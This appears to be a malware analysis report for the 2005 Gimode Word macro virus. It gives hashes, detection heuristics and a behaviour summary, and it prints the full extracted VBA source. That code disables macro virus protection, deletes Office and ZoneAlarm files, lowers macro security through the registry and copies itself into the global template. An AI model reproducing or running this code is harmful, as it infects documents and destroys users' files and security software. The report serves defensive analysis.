Win.Trojan.Psycho-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 ed91b2296226b4ed…

MALICIOUS

Office (OLE)

Size: 49.0 KB · Created: 2005-01-20 15:46:00 · Authoring application: Microsoft Office Word · First seen: 2012-06-14
MD5: 6cf781e14d35b9e90491026cdba5e576
SHA-1: c2df65c6462f5af63e2ebb3a991d9a84aa60ef7c
SHA-256: ed91b2296226b4edd5f4590b095bc193e172351a944d4dc31d71e9035b441b0c
Risk Score: 196

Malware Insights

Win.Trojan.Psycho-3 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is the 'Gimode' Word macro virus (Brazil, 2005), which ClamAV detects as Win.Trojan.Psycho-3. The code is VBA that drives Word through the legacy WordBasic compatibility object (WordBasic.Kill, WordBasic.MacroCopy, WordBasic.CountMacros), which is why the legacy-marker heuristic fires alongside the VBA ones. On AutoOpen it shows a fake Portuguese error dialog ("Your computer is faulty!!"), writes a defacement page to C:\WINDOWS\Omedi.html and sets it as the desktop wallpaper through System.PrivateProfileString registry writes, lowers the Word 2000 macro security level (HKCU\Software\Microsoft\Office\9.0\Word\Security, Level = 1), disables Options.VirusProtection, and overwrites the document's primary header with "Paz em todo o mundo" ("Peace in the whole world"). On the 7th, 14th, 21st and 28th of the month it deletes the contents of the Office program directory; the second date check (8th/15th/22nd/29th, deleting C:\AutoExec.bat, C:\Command.com and C:\Config.sys) is nested inside the first, so as written it can never trigger. AutoClose deletes ZoneAlarm files, saves a copy of the document as C:\Edi.doc, and copies the Gimode module into the global template with WordBasic.MacroCopy so that subsequently opened documents are infected. A Toolsmacro handler disables the Macro > Security... menu item. The sample is destructive and self-replicating; it contains no downloader or second-stage dropper.

Heuristics 6

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            .VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas · Kind: vba-macro · Source: oletools.olevba.extract_macros (decoded VBA source) · Size: 5366 bytes
SHA-256: 73963c3d0a171b5dfdedb30cfe861e6f184b778e92658617a174fbee1494f3db
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Gimode"

'Macro virus name: Gimode
'Infecta documentos word.
'Infect word documents.
'<><><><><><><><><><><><>
'=========================
'Year 2005 - Brasil
'-------------------------
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Word macro virus Gimode"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.Gimode.AutoOpen"
On Error Resume Next
MsgBox " Seu computador esta com defeito!!", vbOKOnly + vbCritical, "Virus informa !!"
Open "C:\WINDOWS\Omedi.html" For Output As #1
 Print #1, "<html><head><title>Virus aqui!</title></head><body bgcolor='#FF0000' link='#FFFF00' vlink='#FF0000'>"
 Print #1, "<h6 align='center'><font color='#EEEE00' size='15'><marquee behavior='alternate' width='70%'>Virus esta animado!</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>+++++++++++++++++++++++++++++++++++++++++++++</marquee></font>"
 Print #1, "<h6 align='center'><font color='#000000' size='15'><marquee behavior='alternate' width='90%'>Este desktop esta muito bonito!</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>+++++++++++++++++++++++++++++++++++++++++++++</marquee></font>"
 Print #1, "<h6 align='center'><font color='#00FF00' size='15'><marquee behavior='alternate' width='70%'>Word macro virus!</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>+++++++++++++++++++++++++++++++++++++++++++++</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>+++++++++++++++++++++++++++++++++++++++++++++</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>+++++++++++++++++++++++++++++++++++++++++++++</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>+++++++++++++++++++++++++++++++++++++++++++++</marquee></font>"
 Close #1
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Desktop", "Wallpaper") = "C:\WINDOWS\Omedi.html"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Desktop", "WebRed") = "Virus ativado" ' Add the value to the registry key
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
   End With
With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).Range
            .Font.Size = 24
            .ParagraphFormat.Alignment = wdAlignParagraphCenter
            .Text = "Paz em todo o mundo"
        End With

If Day(Now()) = 7 Or (Day(Now)) = 14 Or (Day(Now)) = 21 Or (Day(Now)) = 28 Then
MsgBox " Office nгo existe !!", vbOKOnly + vbCritical, "Virus alerta!!"
WordBasic.Kill "C:\Program Files\Microsoft Office\Office\*.*"
WordBasic.Kill "C:\Microsoft Office\Office\*.*"
WordBasic.Kill "C:\Windows\Microsoft Office\Office\*.*"
WordBasic.Kill "C:\Arquivos de programas\Microsoft Office\Office\*.*"

If Day(Now()) = 8 Or (Day(Now)) = 15 Or (Day(Now)) = 22 Or (Day(Now)) = 29 Then
MsgBox "Arquivos importantes foram deletados !!", vbOKOnly + vbCritical, "Virus esclarece!!"
WordBasic.Kill "C:\AutoExec.bat"
WordBasic.Kill "C:\Command.com"
WordBasic.Kill "C:\Config.sys"
    
End If
End If
End Sub
 
Sub Toolsmacro()
Attribute Toolsmacro.VB_Description = "Word macro virus Gimode"
Attribute Toolsmacro.VB_ProcData.VB_Invoke_Func = "Project.Gimode.macro"
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = False
      
End Sub

Sub AutoClose()
Attribute AutoClose.VB_Description = "Word macro virus Gimode"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Project.Gimode.AutoClose"
    
On Error Resume Next

MsgBox "ZoneAlarm apagado !!", vbOKOnly + vbCritical, "Virus responde !!"

WordBasic.Kill "C:\Program Files\Zone Labs\ZoneAlarm\*.*"
WordBasic.Kill "C:\Windows\ZoneLabs\ZoneAlarm\*.*"
WordBasic.Kill "C:\ZoneLabs\ZoneAlarm\*.*"
WordBasic.Kill "C:\Zonealarm.exe"
WordBasic.Kill "C:\Arquivos de programas\Zone Labs\ZoneAlarm\*.*"

ActiveDocument.SaveAs FileName:="C:\Edi.doc"
ActiveDocument.Saved = True

iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
    If WordBasic.[MacroName$](i, 0, 0) = "Gimode" Then
        binstalled = -1
    End If
    If WordBasic.[MacroName$](i, 0, 0) = "Gimode" Then
        bTooMuchTrouble = -1
    End If
Next i
If Not binstalled And Not bTooMuchTrouble Then
    sMe$ = WordBasic.[FileName$]()
    sMacro$ = sMe$ + ":Gimode"
    WordBasic.MacroCopy sMacro$, "Global:Gimode"
    sMacro$ = sMe$ + ":AutoClose"
    WordBasic.MacroCopy sMacro$, "Global:Gimode"
    
End If
End Sub

'Infecta documentos word.
'Infect word documents.
'<><><><><><><><><><><><>
'=========================
'Year 2005 - Brasil
'-------------------------